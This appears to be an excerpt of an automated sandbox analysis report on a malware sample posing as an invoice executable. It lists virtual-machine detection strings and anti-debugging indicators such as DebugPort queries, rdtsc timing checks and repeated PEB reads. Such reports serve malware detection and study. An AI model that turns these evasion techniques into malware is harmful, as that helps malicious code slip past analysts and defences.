Source: explorer.exe, 00000003.00000000.361158752.0000000006417000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: PT300975-inv.exe, 00000000.00000002.345826499.0000000004021000.00000004.00000001.sdmp Binary or memory string: VirtualMachineDetector
Source: explorer.exe, 00000003.00000000.365176187.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000003.00000000.360519668.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.360519668.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.365176187.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000003.00000000.365412810.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000003.00000000.360519668.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000003.00000002.604467265.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00409A90 rdtsc 2_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0040ACD0 LdrLoadDll, 2_2_0040ACD0
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0570C577 mov eax, dword ptr fs:[00000030h] 2_2_0570C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0570C577 mov eax, dword ptr fs:[00000030h] 2_2_0570C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05707D50 mov eax, dword ptr fs:[00000030h] 2_2_05707D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05723D43 mov eax, dword ptr fs:[00000030h] 2_2_05723D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05763540 mov eax, dword ptr fs:[00000030h] 2_2_05763540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0576A537 mov eax, dword ptr fs:[00000030h] 2_2_0576A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057AE539 mov eax, dword ptr fs:[00000030h] 2_2_057AE539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05714D3B mov eax, dword ptr fs:[00000030h] 2_2_05714D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05714D3B mov eax, dword ptr fs:[00000030h] 2_2_05714D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05714D3B mov eax, dword ptr fs:[00000030h] 2_2_05714D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B8D34 mov eax, dword ptr fs:[00000030h] 2_2_057B8D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h] 2_2_056F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056EAD30 mov eax, dword ptr fs:[00000030h] 2_2_056EAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05798DF1 mov eax, dword ptr fs:[00000030h] 2_2_05798DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056FD5E0 mov eax, dword ptr fs:[00000030h] 2_2_056FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056FD5E0 mov eax, dword ptr fs:[00000030h] 2_2_056FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057AFDE2 mov eax, dword ptr fs:[00000030h] 2_2_057AFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057AFDE2 mov eax, dword ptr fs:[00000030h] 2_2_057AFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057AFDE2 mov eax, dword ptr fs:[00000030h] 2_2_057AFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057AFDE2 mov eax, dword ptr fs:[00000030h] 2_2_057AFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05766DC9 mov eax, dword ptr fs:[00000030h] 2_2_05766DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05766DC9 mov eax, dword ptr fs:[00000030h] 2_2_05766DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05766DC9 mov eax, dword ptr fs:[00000030h] 2_2_05766DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05766DC9 mov ecx, dword ptr fs:[00000030h] 2_2_05766DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05766DC9 mov eax, dword ptr fs:[00000030h] 2_2_05766DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05766DC9 mov eax, dword ptr fs:[00000030h] 2_2_05766DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05711DB5 mov eax, dword ptr fs:[00000030h] 2_2_05711DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05711DB5 mov eax, dword ptr fs:[00000030h] 2_2_05711DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05711DB5 mov eax, dword ptr fs:[00000030h] 2_2_05711DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057135A1 mov eax, dword ptr fs:[00000030h] 2_2_057135A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B05AC mov eax, dword ptr fs:[00000030h] 2_2_057B05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B05AC mov eax, dword ptr fs:[00000030h] 2_2_057B05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056E2D8A mov eax, dword ptr fs:[00000030h] 2_2_056E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056E2D8A mov eax, dword ptr fs:[00000030h] 2_2_056E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056E2D8A mov eax, dword ptr fs:[00000030h] 2_2_056E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056E2D8A mov eax, dword ptr fs:[00000030h] 2_2_056E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056E2D8A mov eax, dword ptr fs:[00000030h] 2_2_056E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571FD9B mov eax, dword ptr fs:[00000030h] 2_2_0571FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571FD9B mov eax, dword ptr fs:[00000030h] 2_2_0571FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05712581 mov eax, dword ptr fs:[00000030h] 2_2_05712581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05712581 mov eax, dword ptr fs:[00000030h] 2_2_05712581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05712581 mov eax, dword ptr fs:[00000030h] 2_2_05712581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05712581 mov eax, dword ptr fs:[00000030h] 2_2_05712581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0570746D mov eax, dword ptr fs:[00000030h] 2_2_0570746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0577C450 mov eax, dword ptr fs:[00000030h] 2_2_0577C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0577C450 mov eax, dword ptr fs:[00000030h] 2_2_0577C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571A44B mov eax, dword ptr fs:[00000030h] 2_2_0571A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571BC2C mov eax, dword ptr fs:[00000030h] 2_2_0571BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B740D mov eax, dword ptr fs:[00000030h] 2_2_057B740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B740D mov eax, dword ptr fs:[00000030h] 2_2_057B740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B740D mov eax, dword ptr fs:[00000030h] 2_2_057B740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h] 2_2_057A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h] 2_2_057A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h] 2_2_057A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h] 2_2_057A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h] 2_2_057A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h] 2_2_057A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h] 2_2_057A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h] 2_2_057A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h] 2_2_057A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h] 2_2_057A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h] 2_2_057A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h] 2_2_057A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h] 2_2_057A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h] 2_2_057A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05766C0A mov eax, dword ptr fs:[00000030h] 2_2_05766C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05766C0A mov eax, dword ptr fs:[00000030h] 2_2_05766C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05766C0A mov eax, dword ptr fs:[00000030h] 2_2_05766C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05766C0A mov eax, dword ptr fs:[00000030h] 2_2_05766C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A14FB mov eax, dword ptr fs:[00000030h] 2_2_057A14FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05766CF0 mov eax, dword ptr fs:[00000030h] 2_2_05766CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05766CF0 mov eax, dword ptr fs:[00000030h] 2_2_05766CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05766CF0 mov eax, dword ptr fs:[00000030h] 2_2_05766CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B8CD6 mov eax, dword ptr fs:[00000030h] 2_2_057B8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F849B mov eax, dword ptr fs:[00000030h] 2_2_056F849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056FFF60 mov eax, dword ptr fs:[00000030h] 2_2_056FFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B8F6A mov eax, dword ptr fs:[00000030h] 2_2_057B8F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056FEF40 mov eax, dword ptr fs:[00000030h] 2_2_056FEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056E4F2E mov eax, dword ptr fs:[00000030h] 2_2_056E4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056E4F2E mov eax, dword ptr fs:[00000030h] 2_2_056E4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571E730 mov eax, dword ptr fs:[00000030h] 2_2_0571E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0570F716 mov eax, dword ptr fs:[00000030h] 2_2_0570F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0577FF10 mov eax, dword ptr fs:[00000030h] 2_2_0577FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0577FF10 mov eax, dword ptr fs:[00000030h] 2_2_0577FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B070D mov eax, dword ptr fs:[00000030h] 2_2_057B070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B070D mov eax, dword ptr fs:[00000030h] 2_2_057B070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571A70E mov eax, dword ptr fs:[00000030h] 2_2_0571A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571A70E mov eax, dword ptr fs:[00000030h] 2_2_0571A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057237F5 mov eax, dword ptr fs:[00000030h] 2_2_057237F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05767794 mov eax, dword ptr fs:[00000030h] 2_2_05767794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05767794 mov eax, dword ptr fs:[00000030h] 2_2_05767794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05767794 mov eax, dword ptr fs:[00000030h] 2_2_05767794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F8794 mov eax, dword ptr fs:[00000030h] 2_2_056F8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F766D mov eax, dword ptr fs:[00000030h] 2_2_056F766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0570AE73 mov eax, dword ptr fs:[00000030h] 2_2_0570AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0570AE73 mov eax, dword ptr fs:[00000030h] 2_2_0570AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0570AE73 mov eax, dword ptr fs:[00000030h] 2_2_0570AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0570AE73 mov eax, dword ptr fs:[00000030h] 2_2_0570AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0570AE73 mov eax, dword ptr fs:[00000030h] 2_2_0570AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h] 2_2_056F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h] 2_2_056F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h] 2_2_056F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h] 2_2_056F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h] 2_2_056F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h] 2_2_056F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057AAE44 mov eax, dword ptr fs:[00000030h] 2_2_057AAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057AAE44 mov eax, dword ptr fs:[00000030h] 2_2_057AAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0579FE3F mov eax, dword ptr fs:[00000030h] 2_2_0579FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056EE620 mov eax, dword ptr fs:[00000030h] 2_2_056EE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571A61C mov eax, dword ptr fs:[00000030h] 2_2_0571A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571A61C mov eax, dword ptr fs:[00000030h] 2_2_0571A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056EC600 mov eax, dword ptr fs:[00000030h] 2_2_056EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056EC600 mov eax, dword ptr fs:[00000030h] 2_2_056EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056EC600 mov eax, dword ptr fs:[00000030h] 2_2_056EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05718E00 mov eax, dword ptr fs:[00000030h] 2_2_05718E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1608 mov eax, dword ptr fs:[00000030h] 2_2_057A1608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F76E2 mov eax, dword ptr fs:[00000030h] 2_2_056F76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057116E0 mov ecx, dword ptr fs:[00000030h] 2_2_057116E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B8ED6 mov eax, dword ptr fs:[00000030h] 2_2_057B8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05728EC7 mov eax, dword ptr fs:[00000030h] 2_2_05728EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0579FEC0 mov eax, dword ptr fs:[00000030h] 2_2_0579FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057136CC mov eax, dword ptr fs:[00000030h] 2_2_057136CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057646A7 mov eax, dword ptr fs:[00000030h] 2_2_057646A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B0EA5 mov eax, dword ptr fs:[00000030h] 2_2_057B0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B0EA5 mov eax, dword ptr fs:[00000030h] 2_2_057B0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B0EA5 mov eax, dword ptr fs:[00000030h] 2_2_057B0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0577FE87 mov eax, dword ptr fs:[00000030h] 2_2_0577FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056EC962 mov eax, dword ptr fs:[00000030h] 2_2_056EC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056EB171 mov eax, dword ptr fs:[00000030h] 2_2_056EB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056EB171 mov eax, dword ptr fs:[00000030h] 2_2_056EB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0570B944 mov eax, dword ptr fs:[00000030h] 2_2_0570B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0570B944 mov eax, dword ptr fs:[00000030h] 2_2_0570B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571513A mov eax, dword ptr fs:[00000030h] 2_2_0571513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571513A mov eax, dword ptr fs:[00000030h] 2_2_0571513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05704120 mov eax, dword ptr fs:[00000030h] 2_2_05704120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05704120 mov eax, dword ptr fs:[00000030h] 2_2_05704120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05704120 mov eax, dword ptr fs:[00000030h] 2_2_05704120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05704120 mov eax, dword ptr fs:[00000030h] 2_2_05704120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05704120 mov ecx, dword ptr fs:[00000030h] 2_2_05704120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056E9100 mov eax, dword ptr fs:[00000030h] 2_2_056E9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056E9100 mov eax, dword ptr fs:[00000030h] 2_2_056E9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056E9100 mov eax, dword ptr fs:[00000030h] 2_2_056E9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056EB1E1 mov eax, dword ptr fs:[00000030h] 2_2_056EB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056EB1E1 mov eax, dword ptr fs:[00000030h] 2_2_056EB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056EB1E1 mov eax, dword ptr fs:[00000030h] 2_2_056EB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057741E8 mov eax, dword ptr fs:[00000030h] 2_2_057741E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057651BE mov eax, dword ptr fs:[00000030h] 2_2_057651BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057651BE mov eax, dword ptr fs:[00000030h] 2_2_057651BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057651BE mov eax, dword ptr fs:[00000030h] 2_2_057651BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057651BE mov eax, dword ptr fs:[00000030h] 2_2_057651BE
